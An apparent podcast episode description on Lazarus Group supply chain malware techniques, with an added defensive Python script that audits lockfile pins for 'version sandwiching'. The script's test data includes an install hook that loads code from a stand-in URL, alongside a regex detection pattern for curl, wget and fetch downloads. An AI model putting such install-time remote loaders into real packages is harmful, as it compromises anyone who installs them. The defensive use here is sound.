Description

This week we talked about:

DPRK Lazarus Group trends in software supply chain malware: Three active techniques our guest is observing from North Korea's Lazarus Group. The first is “version sandwiching,” where threat actors publish benign versions of a package before and after a malicious one, then pin their delivery mechanism to the malicious version, so scanners that only check the latest release see nothing wrong. The second is their continued reuse of Aptos, Tron, and Binance BSC blockchain addresses as mutable C2 infrastructure, which lets defenders tie disparate campaigns to the same threat actor. The third is human-readable campaign name strings embedded in payloads, functioning like UTM tags and likely reflecting internal tracking within Lazarus subgroups.

General supply chain threat landscape: Cross-ecosystem attacks, once limited to nation-state actors, are now being executed by low-sophistication crews using vibe coding tools to quickly port payloads across npm, PyPI, and other registries simultaneously. Package clusters, where only one or two packages in a published group carry the actual payload, have become standard operating procedure across threat actors of all levels. Dynamic imports and payload splitting are also on the rise, bypassing package managers and firewalls by pulling dependencies from URLs at runtime or distributing payload components across multiple files.
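As an added illustration (not code from the episode or from the speakers), the following Python audit applies two defensive lessons from the points above: it resolves a lockfile pin against a package's full version history rather than only the latest release, so a sandwiched malicious version is actually inspected, and it statically flags install-time hooks that pull code from URLs at runtime, the dynamic-import pattern described above. Every package name, version, install script, and URL below is constructed for the example; the regular expressions are a heuristic and the `Release`, `Finding`, `audit_pin`, and `audit_lockfile` names are assumptions of this example, not any real tool's API.

```python
"""Audit dependency pins against full registry history (constructed data)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Release:
    version: str
    install_script: str  # constructed contents of an install-time hook


@dataclass(frozen=True)
class Finding:
    package: str
    pinned: str
    latest: str
    remote_fetches: tuple[str, ...]  # matched remote-fetch snippets in the pinned release
    sandwiched: bool                 # pinned release fetches remotely, neighbours do not


# Heuristic patterns for code that pulls dependencies from a URL at install/run time.
REMOTE_FETCH = re.compile(
    r"""import\s*\(\s*['"]https?://[^'"]+['"]"""        # JS dynamic import from a URL
    r"""|fetch\s*\(\s*['"]https?://[^'"]+['"]"""        # fetch() of remote code
    r"""|urlopen\s*\(\s*['"]https?://[^'"]+['"]"""      # Python urllib
    r"""|\b(?:curl|wget)\s+(?:-\S+\s+)*https?://\S+"""  # shell download in a hook
)


def version_key(v: str) -> tuple[int, ...]:
    """Order plain dotted versions numerically (so 1.0.10 sorts after 1.0.9)."""
    return tuple(int(part) for part in v.split("."))


def remote_fetches(script: str) -> tuple[str, ...]:
    """Return every remote-fetch snippet found in an install script."""
    return tuple(m.group(0) for m in REMOTE_FETCH.finditer(script))


def audit_pin(name: str, releases: list[Release], pinned: str) -> Finding:
    """Inspect the pinned release itself, not the latest one, and compare it
    with its immediate neighbours in the version history."""
    by_version = {r.version: r for r in releases}
    if pinned not in by_version:
        raise ValueError(f"{name}@{pinned} is not in the registry history")
    ordered = sorted(by_version, key=version_key)
    latest = ordered[-1]
    idx = ordered.index(pinned)
    hits = remote_fetches(by_version[pinned].install_script)
    neighbours = [by_version[v] for v in ordered[max(0, idx - 1):idx] + ordered[idx + 1:idx + 2]]
    sandwiched = (
        bool(hits)
        and 0 < idx < len(ordered) - 1
        and all(not remote_fetches(r.install_script) for r in neighbours)
    )
    return Finding(name, pinned, latest, hits, sandwiched)


def audit_lockfile(pins: dict[str, str], registry: dict[str, list[Release]]) -> dict[str, Finding]:
    """Audit every pin in a lockfile-style mapping of package -> exact version."""
    return {name: audit_pin(name, registry[name], version) for name, version in pins.items()}


# Constructed registry history: 1.0.1 is the only release with a remote fetch,
# and it is wrapped by two benign releases (the "version sandwich").
REGISTRY = {
    "example-widget": [
        Release("1.0.0", "node ./scripts/build.js"),
        Release("1.0.1", "node -e \"import('https://cdn.example.invalid/loader.js')\""),
        Release("1.0.2", "node ./scripts/build.js"),
    ],
    "tidy-lib": [
        Release("2.0.0", "echo ok"),
        Release("2.1.0", "echo ok"),
    ],
}
# Constructed lockfile: the delivery mechanism pins the sandwiched version.
LOCKFILE_PINS = {"example-widget": "1.0.1", "tidy-lib": "2.1.0"}

if __name__ == "__main__":
    for finding in audit_lockfile(LOCKFILE_PINS, REGISTRY).values():
        status = "SUSPICIOUS" if finding.remote_fetches else "clean"
        print(f"{finding.package}@{finding.pinned} (latest {finding.latest}): "
              f"{status}, sandwiched={finding.sandwiched}, hits={finding.remote_fetches}")
```

The point of `audit_pin` is that the scan target is whatever version the lockfile resolves to; a check that only looks at `latest` would report `example-widget` as clean here. The neighbour comparison is a cheap signal, not proof: a benign release that happens to download a build asset will also match, so treat the output as a triage queue rather than a verdict.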

Episode Resources